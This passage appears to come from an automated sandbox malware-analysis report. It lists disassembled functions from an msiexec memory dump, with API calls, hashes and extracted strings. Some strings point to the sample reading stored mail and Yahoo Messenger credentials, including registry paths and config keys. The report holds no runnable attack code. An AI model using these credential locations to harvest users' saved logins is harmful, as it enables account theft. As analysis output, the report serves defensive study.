                                                                                                          • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                          APIs
                                                                                                          • _strcmpi.MSVCRT ref: 0040E134
                                                                                                          • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                          • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcmpi$_mbscpy
                                                                                                          • String ID: smtp
                                                                                                          • API String ID: 2625860049-60245459
                                                                                                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                          • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040C28C
                                                                                                          • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                          • String ID: S_@$l
                                                                                                          • API String ID: 3436799508-4018740455
                                                                                                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                          • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004092C0
                                                                                                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                          Strings
                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                          • API String ID: 408644273-3424043681
                                                                                                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                          • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy
                                                                                                          • String ID: C^@$X$ini
                                                                                                          • API String ID: 714388716-917056472
                                                                                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                          • String ID: MS Sans Serif
                                                                                                          • API String ID: 3492281209-168460110
                                                                                                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                          • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 275601554-2167791130
                                                                                                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                          • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen$_mbscat
                                                                                                          • String ID: 3CD
                                                                                                          • API String ID: 3951308622-1938365332
                                                                                                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                          • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: rows deleted
                                                                                                          • API String ID: 2221118986-571615504
                                                                                                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1860491036-0
                                                                                                          • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                          • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040D2C2
                                                                                                          • memset.MSVCRT ref: 0040D2D8
                                                                                                          • memset.MSVCRT ref: 0040D2EA
                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                          • memset.MSVCRT ref: 0040D319
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$memcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 368790112-0
                                                                                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                          APIs
                                                                                                          • __allrem.LIBCMT ref: 00425850
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                          • __allrem.LIBCMT ref: 00425933
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1992179935-0
                                                                                                          • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                          • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                          • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                          • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • too many SQL variables, xrefs: 0042C6FD
                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                          • API String ID: 2221118986-515162456
                                                                                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                          • memset.MSVCRT ref: 004026AD
                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                            • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                            • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3503910906-0
                                                                                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                          • strlen.MSVCRT ref: 0040B60B
                                                                                                          • atoi.MSVCRT(?), ref: 0040B619
                                                                                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4107816708-0
                                                                                                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                          • _gmtime64.MSVCRT ref: 00411437
                                                                                                          • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                          • strftime.MSVCRT ref: 00411476
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                          • String ID:
                                                                                                          • API String ID: 1886415126-0
                                                                                                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen
                                                                                                          • String ID: >$>$>
                                                                                                          • API String ID: 39653677-3911187716
                                                                                                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcmpi
                                                                                                          • String ID: C@$mail.identity
                                                                                                          • API String ID: 1439213657-721921413
                                                                                                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00444573
                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValuememset
                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                          • API String ID: 3363972335-1703613266
                                                                                                          • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                          • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00406640
                                                                                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                          • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                          • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset$memcmp
                                                                                                          • String ID: Ul@
                                                                                                          • API String ID: 270934217-715280498
                                                                                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                          APIs
                                                                                                            • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                          Strings
                                                                                                          • recovered %d pages from %s, xrefs: 004188B4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                          • String ID: recovered %d pages from %s
                                                                                                          • API String ID: 985450955-1623757624
                                                                                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ultoasprintf
                                                                                                          • String ID: %s %s %s
                                                                                                          • API String ID: 432394123-3850900253
                                                                                                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                          APIs
                                                                                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                          • sprintf.MSVCRT ref: 0040909B
                                                                                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                          • String ID: menu_%d
